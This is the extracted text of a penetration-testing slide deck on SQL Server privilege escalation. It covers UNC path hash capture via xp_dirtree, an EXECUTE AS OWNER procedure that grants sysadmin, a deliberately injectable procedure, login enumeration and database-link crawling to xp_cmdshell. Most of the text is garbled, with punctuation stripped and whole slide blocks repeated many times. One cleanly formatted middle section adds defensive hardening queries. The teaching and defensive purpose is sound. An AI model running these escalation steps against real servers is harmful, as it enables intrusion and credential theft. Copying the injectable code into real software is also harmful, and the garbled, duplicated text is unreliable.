Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
Escalating Privileges Weak Passwords
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges: Weak Passwords
2. Get the principal id for the sa account with "suser_id"
3. Use "suser_name" to get SQL logins using just the principal ID
4. Increment the number and repeat

select n [id], SUSER_NAME(n) [user_name]
from ( select top 10000 row_number() over(order by t1.number) as N
       from master..spt_values t1 cross join master..spt_values t2 ) a
where SUSER_NAME(n) is not null

Code gifted from mobileck. Source: https://gist.github.com/ConstantineK/c6de5d398ec43bab1a29ef07e8c21ec7
3. Grab the first 48 bytes of the full RID:
   RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000
   SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges: Impersonation (Stored Procedure and Trigger Creation Injection Issues)
• EXECUTE AS OWNER can be used to execute a stored procedure as another login
Pros
• Can execute queries/commands in another user context
• Limit commands and queries
• Don't have to grant IMPERSONATE
Cons
• No granular control over the database owner's privileges
• DB_OWNER role can EXECUTE AS OWNER of the DB, which is often a sysadmin
• Requires the database to be configured as trustworthy for OS command execution
• Impersonation can be done via SQL injection under specific conditions
• Impersonation can be done via command injection under specific conditions
Escalating Privileges: Impersonation (Stored Procedure and Trigger Creation Injection Issues)
• EXECUTE AS OWNER can be used to execute a stored procedure as another login
• DB_OWNER role can impersonate the actual database owner

USE MyAppDb
GO
CREATE PROCEDURE sp_escalate_me
WITH EXECUTE AS OWNER
AS
EXEC sp_addsrvrolemember 'MyAppUser','sysadmin'
GO

SYSADMIN is often the OWNER
Escalating Privileges: Impersonation (Stored Procedure and Trigger Creation Injection Issues)
• Use signed procedures
  o Create stored procedure
  o Create a database master key
  o Create a certificate
  o Create a login from the certificate
  o Configure login privileges
  o Sign stored procedure with certificate
  o GRANT EXECUTE to user
Pros
• Can execute queries/commands in another user context
• Limit commands and queries
• Don't have to grant IMPERSONATE
• Granular control over permissions
• Database does NOT have to be configured as trustworthy for OS command execution
Cons
• Impersonation can be done via SQL injection under specific conditions
• Impersonation can be done via command injection under specific conditions
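The signed-procedure steps above, carried through in T-SQL as an added example (not code from the slides or from PowerUpSQL). It is the mitigation for the EXECUTE AS OWNER cons listed before it: the database stays TRUSTWORTHY OFF and the certificate login receives one server permission instead of sysadmin. Database, user, procedure, certificate, login and file-path names are placeholders.

```sql
-- Added example, not from the PowerUpSQL slides: module signing instead of
-- EXECUTE AS OWNER. MyAppDb, MyAppUser, usp_active_sessions, CodeSigningCert,
-- CodeSigningLogin and C:\certs\... are placeholder names.
USE MyAppDb;
GO
-- 1. Create the stored procedure that needs a right its callers lack
--    (VIEW SERVER STATE, to read the active sessions).
CREATE PROCEDURE dbo.usp_active_sessions
AS
    SELECT session_id, login_name, host_name, program_name
    FROM   sys.dm_exec_sessions
    WHERE  is_user_process = 1;
GO
-- 2. Create a database master key (it protects the certificate's private key).
CREATE MASTER KEY ENCRYPTION BY PASSWORD = '<placeholder: strong password>';
-- 3. Create a certificate in the application database.
CREATE CERTIFICATE CodeSigningCert WITH SUBJECT = 'Signs usp_active_sessions';
GO
-- 6. Sign the procedure. ALTER PROCEDURE drops the signature, so a module
--    whose text is tampered with loses the extra right instead of keeping it.
ADD SIGNATURE TO dbo.usp_active_sessions BY CERTIFICATE CodeSigningCert;
-- Export only the public key, then discard the private key so that db_owner
-- members cannot sign further procedures with this certificate.
BACKUP CERTIFICATE CodeSigningCert TO FILE = 'C:\certs\CodeSigningCert.cer';
ALTER CERTIFICATE CodeSigningCert REMOVE PRIVATE KEY;
GO
-- 4. Create a login from the (public) certificate in master and
-- 5. configure its privileges: least privilege, no sysadmin membership.
USE master;
GO
CREATE CERTIFICATE CodeSigningCert FROM FILE = 'C:\certs\CodeSigningCert.cer';
CREATE LOGIN CodeSigningLogin FROM CERTIFICATE CodeSigningCert;
GRANT VIEW SERVER STATE TO CodeSigningLogin;
GO
-- 7. GRANT EXECUTE to the application user. When MyAppUser runs the procedure,
--    the signature adds CodeSigningLogin's permission to the execution context.
USE MyAppDb;
GO
GRANT EXECUTE ON dbo.usp_active_sessions TO MyAppUser;
GO
```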
Escalating Privileges: Impersonation (SQL Injection Example)

CREATE PROCEDURE sp_sqli2
@DbName varchar(max)
AS
BEGIN
Declare @query as varchar(max)
SET @query = 'SELECT name FROM master..sysdatabases WHERE name like ''%'+ @DbName+'%'' OR name=''tempdb'''
EXECUTE(@query)
END
GO
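As an added example (not from the slides), the same lookup written so that @DbName can no longer change the statement. The first version drops dynamic SQL altogether; the second shows sp_executesql for the cases where dynamic SQL is genuinely needed. Procedure names are placeholders.

```sql
-- Added example, not from the PowerUpSQL slides: sp_sqli2 without the injection.
-- If a procedure like sp_sqli2 also carries WITH EXECUTE AS OWNER, injected
-- text runs as the owner (often a sysadmin), so this fix matters more than usual.
CREATE PROCEDURE dbo.sp_sqli2_static
    @DbName sysname      -- sysname bounds the input; varchar(max) is not needed
AS
BEGIN
    SET NOCOUNT ON;
    -- @DbName is data here; it can never alter the statement's shape.
    SELECT name
    FROM   master.sys.databases
    WHERE  name LIKE '%' + @DbName + '%' OR name = N'tempdb';
END
GO

CREATE PROCEDURE dbo.sp_sqli2_dynamic
    @DbName sysname
AS
BEGIN
    SET NOCOUNT ON;
    DECLARE @query nvarchar(max) =
        N'SELECT name FROM master.sys.databases '
      + N'WHERE name LIKE ''%'' + @pattern + ''%'' OR name = N''tempdb'';';
    -- The value travels as the @pattern parameter and is never concatenated
    -- into @query, so a payload such as ' OR 1=1-- is matched literally.
    EXEC sys.sp_executesql
         @stmt    = @query,
         @params  = N'@pattern sysname',
         @pattern = @DbName;
END
GO
```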
Escalating Privileges: Shared Service Accounts
Why should I care about shared service accounts?
1. SysAdmins can execute OS commands
2. OS commands run as the SQL Server service account
3. Service accounts have sysadmin privileges by default
4. Companies often use a single domain account to run hundreds of SQL Servers
5. So if you get sysadmin on one server, you have it on all of them
One account to rule them all
[Figure: Leveraging Shared MS SQL Server Service Accounts. Network diagram with Internet, DMZ and Intranet zones; LRA, HVA and LVA applications and ADS; ports 80 and 443 into the DMZ, ports 1433 and 1434 into the intranet; the attacker is drawn as "Captain Evil". Key: HVA = High Value Application, LVA = Low Value Application. Steps shown across the four builds of the slide: 1. SQL injection against an LVA; 2. Execute local command via xp_cmdshell; 3. Access to HVA with the shared domain service account, then execute commands and gather data from other database servers via osql.]
Escalating Privileges
Crawling Server Links

Escalating Privileges: Crawling Server Links
What's a database link?
Database links are basically persistent database connections for SQL Servers
Why should I care?
Short answer = privilege escalation
• Public role can use links to execute queries on remote servers (impersonation)
  SELECT * FROM OpenQuery([SQLSERVER2],'SELECT @@Version')
• Stored procedures can be executed (xp_cmdshell)
• Links can be crawled
[Figure: Leveraging MS SQL Database links. Same network diagram (Internet, DMZ, Intranet; LRA, HVA, LVA, ADS; ports 80 and 443, ports 1433 and 1434; attacker "Captain Evil"). Key: HVA = High Value Application, LVA = Low Value Application. Steps shown across the four builds of the slide: 1. SQL injection against the LVA in front of DB1; from DB1 a DB link configured with least privileges leads to a further DB link configured with the SA account; 2. Execute SQL queries and local commands on database servers via nested linked services.]
Escalating Privileges: Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50% of environments we've seen
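As an added example (not from the slides or PowerUpSQL), a T-SQL audit of the link configuration behind the crawling scenario: which linked servers exist, whether they allow remote procedure calls, and whether every local login (including public) is mapped onto one fixed remote login, the "DB link with SA account" case from the figure. SQLSERVER2 is the link name used on the slides; the hardening statements at the end assume a link that only needs pass-through queries.

```sql
-- Added example, not from the PowerUpSQL slides: inventory linked servers and
-- their login mappings.
SELECT  s.name                         AS link_name,
        s.data_source,
        s.provider,
        s.is_rpc_out_enabled,          -- 1: EXEC ... AT [link] is allowed
        s.is_data_access_enabled,      -- 1: OPENQUERY is allowed
        CASE WHEN ll.local_principal_id = 0
             THEN 'any local login (incl. public)'
             ELSE SUSER_NAME(ll.local_principal_id)
        END                            AS local_login,
        CASE WHEN ll.uses_self_credential = 1 THEN '(caller''s own credentials)'
             ELSE ISNULL(ll.remote_name, '(no remote login: access denied)')
        END                            AS remote_login,
        CASE WHEN ll.local_principal_id = 0
              AND ll.uses_self_credential = 0
              AND ll.remote_name IS NOT NULL
             THEN 'REVIEW: every local login borrows a fixed remote login'
             ELSE ''
        END                            AS finding
FROM    sys.servers AS s
LEFT JOIN sys.linked_logins AS ll ON ll.server_id = s.server_id
WHERE   s.is_linked = 1
ORDER BY s.name, ll.local_principal_id;
GO

-- Hardening for a link that only needs pass-through SELECTs: turn off RPC Out
-- (closes the remote xp_cmdshell route) and map logins to their own
-- credentials instead of a shared fixed account.
EXEC sys.sp_serveroption      @server = N'SQLSERVER2', @optname = N'rpc out', @optvalue = N'false';
EXEC sys.sp_addlinkedsrvlogin @rmtsrvname = N'SQLSERVER2', @useself = N'TRUE';
GO
```

A row whose finding column reads REVIEW and whose remote_login is a sysadmin on the far side is exactly the hop that turns a low-privilege link into the nested "SA account" link of the figure.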
Escalating Privileges: UNC Path Injection
• UNC paths are used for accessing remote file servers, like so: \\192.168.1.4\file
• Almost all procedures that accept a file path in SQL Server support UNC paths
• UNC paths can be used to force the SQL Server service account to authenticate to an attacker
• An attacker can then capture the NetNTLM password hash and crack or relay it
• Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges: UNC Path Injection
Oh yeah…
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path:
xp_dirtree
xp_fileexist
Escalating Privileges: UNC Path Injection
So in summary…
The PUBLIC role can access the SQL Server service account NetNTLM password hash by default

Escalating Privileges: UNC Path Injection
But who really has PUBLIC role access?
Oh yeah, a ton of domain users
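As an added example (not from the slides or PowerUpSQL), the check and the fix on the defending side: list the explicit permissions on the two file-path procedures the slides name, then withdraw the default EXECUTE grant from public so that a plain domain user with a login can no longer make the service account authenticate outbound.

```sql
-- Added example, not from the PowerUpSQL slides: audit and revoke the default
-- public EXECUTE right on the file-path procedures in master.
USE master;
GO
SELECT  o.name                AS procedure_name,
        pr.name               AS grantee,
        dp.permission_name,
        dp.state_desc         -- GRANT or DENY
FROM    sys.database_permissions AS dp
JOIN    sys.objects              AS o  ON o.object_id = dp.major_id
JOIN    sys.database_principals  AS pr ON pr.principal_id = dp.grantee_principal_id
WHERE   dp.class = 1                                -- object-level permissions
  AND   o.name IN ('xp_dirtree', 'xp_fileexist');  -- the two named on the slide
GO
-- Remove the low-privilege path. sysadmin members are unaffected (they bypass
-- permission checks), so SSMS file-browse dialogs that call xp_dirtree keep
-- working for them; retest any non-admin tooling that relied on the grant.
REVOKE EXECUTE ON xp_dirtree   FROM public;
REVOKE EXECUTE ON xp_fileexist FROM public;
GO
-- Re-run the SELECT above: no rows for public should remain.
```

Pair the revoke with egress filtering of SMB (TCP 445) from database hosts, since a sysadmin, or any other procedure that takes a path, can still be pointed at a UNC path.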
Escalating Privileges: DEMO
DEMO: Get-SQLServiceAccountPwHashes
…what? It's self descriptive

Escalating Privileges: UNC Path Injection
DEMO
Escalating Privileges Weak Passwords
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
